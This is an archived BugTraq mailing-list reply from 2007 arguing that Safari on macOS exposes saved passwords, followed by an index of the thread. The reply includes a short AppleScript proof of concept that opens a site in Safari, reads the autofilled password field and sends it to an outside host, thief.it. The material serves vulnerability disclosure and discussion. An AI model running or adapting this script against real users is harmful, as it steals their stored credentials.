BugTraq
Re: RE: Apple Safari on MacOSX may reveal user's saved passwords May 14 2007 10:35PM
poplix papuasia org (1 replies)
Mark, you read it correctly and you're right, anyway a malicious user at your console should not be able to read your passwords. Also note that to steal saved passwords it's sufficent to entice a victim to execute a malicious script like that:

--BOF
tell application "Safari"
open location "https://www.target.com"
end tell

do shell script "/bin/sleep 10"

tell application "Safari"
do JavaScript "document.location.href='http://thief.it/steal_target?p='+document.login
form.password.value" in document 1
end tell
--EOF

I agree with you in saying that the execution of malicious scripts can lead in much more dangeruos attacks, anyway i consider this a vulnerability and i dont know why Apple belives this is the correct behaviour. . .

many thanks for your comment

-p

[ reply ]
Re: Apple Safari on MacOSX may reveal user's saved passwords May 15 2007 10:15PM
David Cantrell (d cantrell outcometechnologies com) (1 replies)
Re: Apple Safari on MacOSX may reveal user's saved passwords May 16 2007 05:42PM
graham coles the-logic-group com (2 replies)
Re: Apple Safari on MacOSX may reveal user's saved passwords May 17 2007 11:47AM
David Cantrell (d cantrell outcometechnologies com) (2 replies)
Re: Apple Safari on MacOSX may reveal user's saved passwords May 17 2007 05:50PM
graham coles the-logic-group com (1 replies)
Re: Apple Safari on MacOSX may reveal user's saved passwords May 18 2007 01:23PM
poplix (poplix papuasia org) (1 replies)
Re: Apple Safari on MacOSX may reveal user's saved passwords May 18 2007 05:13PM
Kevin Finisterre (lists) (kf_lists digitalmunition com) (1 replies)
Re: Apple Safari on MacOSX may reveal user's saved passwords May 18 2007 11:43PM
poplix (poplix papuasia org)
Re: Apple Safari on MacOSX may reveal user's saved passwords May 17 2007 04:49PM
Mark Senior (senatorfrog gmail com)
Re: Apple Safari on MacOSX may reveal user's saved passwords May 16 2007 07:21PM
Ian Ward Comfort (icomfort rescomp stanford edu)


 

Privacy Statement
Copyright 2010, SecurityFocus